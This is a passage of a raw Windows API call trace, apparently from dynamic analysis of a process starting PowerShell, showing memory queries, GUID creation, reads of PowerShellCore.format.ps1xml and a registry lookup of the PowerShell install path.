AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.937] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.937] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.938] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.938] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.938] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.938] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.938] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.938] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xcc5fd960, Data2=0xc5ec, Data3=0x45b9, Data4=([0]=0xa7, [1]=0xe2, [2]=0xb5, [3]=0xa4, [4]=0x17, [5]=0x2e, [6]=0x3, [7]=0x32))) returned 0x0 [0052.938] VirtualQuery (in: lpAddress=0x14d654, lpBuffer=0x14e654, dwLength=0x1c | out: lpBuffer=0x14e654*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.939] VirtualQuery (in: lpAddress=0x14d654, lpBuffer=0x14e654, dwLength=0x1c | out: lpBuffer=0x14e654*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.939] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.939] VirtualQuery (in: lpAddress=0x14d654, lpBuffer=0x14e654, dwLength=0x1c | out: lpBuffer=0x14e654*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.939] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.940] VirtualQuery (in: lpAddress=0x14d654, lpBuffer=0x14e654, dwLength=0x1c | out: lpBuffer=0x14e654*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.940] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.940] VirtualQuery (in: lpAddress=0x14d654, lpBuffer=0x14e654, dwLength=0x1c | out: lpBuffer=0x14e654*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.940] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.941] VirtualQuery (in: lpAddress=0x14d654, lpBuffer=0x14e654, dwLength=0x1c | out: lpBuffer=0x14e654*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.941] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.941] VirtualQuery (in: lpAddress=0x14d654, lpBuffer=0x14e654, dwLength=0x1c | out: lpBuffer=0x14e654*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.941] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.942] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.942] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.942] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.942] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.942] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.942] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.943] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.943] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xdbbd2c5d, Data2=0xe5fe, Data3=0x4bec, Data4=([0]=0xa9, [1]=0x75, [2]=0x68, [3]=0x11, [4]=0x62, [5]=0x7e, [6]=0x9a, [7]=0xf))) returned 0x0 [0052.943] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.943] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.944] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.944] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.944] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.944] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.944] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.944] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.945] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.945] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.945] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.945] VirtualQuery (in: lpAddress=0x14d4cc, lpBuffer=0x14e4cc, dwLength=0x1c | out: lpBuffer=0x14e4cc*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.945] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.946] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.946] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.946] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.946] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xda391b8a, Data2=0xa1f, Data3=0x433c, Data4=([0]=0x97, [1]=0x41, [2]=0xf5, [3]=0x1c, [4]=0x6a, [5]=0x78, [6]=0x1b, [7]=0xe0))) returned 0x0 [0052.946] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x651de7ac, Data2=0xec0f, Data3=0x44d6, Data4=([0]=0x9f, [1]=0x87, [2]=0x6f, [3]=0xc1, [4]=0xd0, [5]=0x57, [6]=0x4b, [7]=0xa3))) returned 0x0 [0052.946] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xb7cc606a, Data2=0xfa9, Data3=0x4b16, Data4=([0]=0xb4, [1]=0x9e, [2]=0xc9, [3]=0x86, [4]=0xd4, [5]=0x23, [6]=0x29, [7]=0xe7))) returned 0x0 [0052.947] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xbe2fe86c, Data2=0x3f1b, Data3=0x40a8, Data4=([0]=0xb5, [1]=0x22, [2]=0xcf, [3]=0x7e, [4]=0x8d, [5]=0x20, [6]=0xdc, [7]=0xb1))) returned 0x0 [0052.947] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x2bb7b865, Data2=0x3f2c, Data3=0x4813, Data4=([0]=0x8a, [1]=0xe5, [2]=0x29, [3]=0x75, [4]=0x58, [5]=0x78, [6]=0xec, [7]=0x11))) returned 0x0 [0052.948] VirtualQuery (in: lpAddress=0x14d55c, lpBuffer=0x14e55c, dwLength=0x1c | out: lpBuffer=0x14e55c*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.948] VirtualQuery (in: lpAddress=0x14d598, lpBuffer=0x14e598, dwLength=0x1c | out: lpBuffer=0x14e598*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.948] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x9803a797, Data2=0x45a7, Data3=0x4a33, Data4=([0]=0x8f, [1]=0x4e, [2]=0x90, [3]=0x48, [4]=0xcd, [5]=0x2, [6]=0xe3, [7]=0x71))) returned 0x0 [0052.948] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x22de3bb5, Data2=0xff5f, Data3=0x49e9, Data4=([0]=0x9a, [1]=0xe3, [2]=0xf9, [3]=0x6b, [4]=0xe5, [5]=0x3b, [6]=0x3b, [7]=0x42))) returned 0x0 [0052.948] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x16416e97, Data2=0x555f, Data3=0x4b18, Data4=([0]=0x9d, [1]=0xd7, [2]=0x83, [3]=0xd, [4]=0x92, [5]=0xb9, [6]=0xdc, [7]=0x6a))) returned 0x0 [0052.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0052.948] GetLastError () returned 0x0 [0052.948] SetErrorMode (uMode=0x1) returned 0x1 [0052.949] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0052.949] GetLastError () returned 0x0 [0052.949] GetFileType (hFile=0x2f8) returned 0x1 [0052.949] SetErrorMode (uMode=0x1) returned 0x1 [0052.949] GetFileType (hFile=0x2f8) returned 0x1 [0052.949] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.955] GetLastError () returned 0x0 [0052.956] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.956] GetLastError () returned 0x0 [0052.956] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.956] GetLastError () returned 0x0 [0052.956] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.956] GetLastError () returned 0x0 [0052.956] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.956] GetLastError () returned 0x0 [0052.957] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.957] GetLastError () returned 0x0 [0052.957] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.957] GetLastError () returned 0x0 [0052.957] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.957] GetLastError () returned 0x0 [0052.957] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.957] GetLastError () returned 0x0 [0052.958] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.958] GetLastError () returned 0x0 [0052.958] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.958] GetLastError () returned 0x0 [0052.958] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.958] GetLastError () returned 0x0 [0052.959] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.959] GetLastError () returned 0x0 [0052.959] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.959] GetLastError () returned 0x0 [0052.959] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.959] GetLastError () returned 0x0 [0052.959] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.959] GetLastError () returned 0x0 [0052.959] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.959] GetLastError () returned 0x0 [0052.961] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.961] GetLastError () returned 0x0 [0052.961] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.961] GetLastError () returned 0x0 [0052.961] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.961] GetLastError () returned 0x0 [0052.961] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.961] GetLastError () returned 0x0 [0052.961] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0xe67, lpOverlapped=0x0) returned 1 [0052.961] GetLastError () returned 0x0 [0052.961] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ede57, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ede57*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.961] GetLastError () returned 0x0 [0052.961] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.961] GetLastError () returned 0x0 [0052.961] CloseHandle (hObject=0x2f8) returned 1 [0052.962] GetLastError () returned 0x0 [0052.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0052.962] GetLastError () returned 0x0 [0052.962] SetErrorMode (uMode=0x1) returned 0x1 [0052.962] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x280f0e0 | out: lpFileInformation=0x280f0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0052.962] GetLastError () returned 0x0 [0052.962] SetErrorMode (uMode=0x1) returned 0x1 [0052.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0052.962] GetLastError () returned 0x0 [0052.962] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.962] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.962] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: lpType=0x14e9b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.962] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0052.962] GetLastError () returned 0x0 [0052.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0052.962] GetLastError () returned 0x0 [0052.965] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x5259fa19, Data2=0xb037, Data3=0x44f9, Data4=([0]=0x98, [1]=0x8b, [2]=0x96, [3]=0x60, [4]=0x99, [5]=0xe8, [6]=0x9e, [7]=0xb0))) returned 0x0 [0052.965] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x49a47fc1, Data2=0x67de, Data3=0x46be, Data4=([0]=0xa4, [1]=0xed, [2]=0x61, [3]=0x85, [4]=0xae, [5]=0xaf, [6]=0x9f, [7]=0x22))) returned 0x0 [0052.965] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x9e057d1, Data2=0x9bbd, 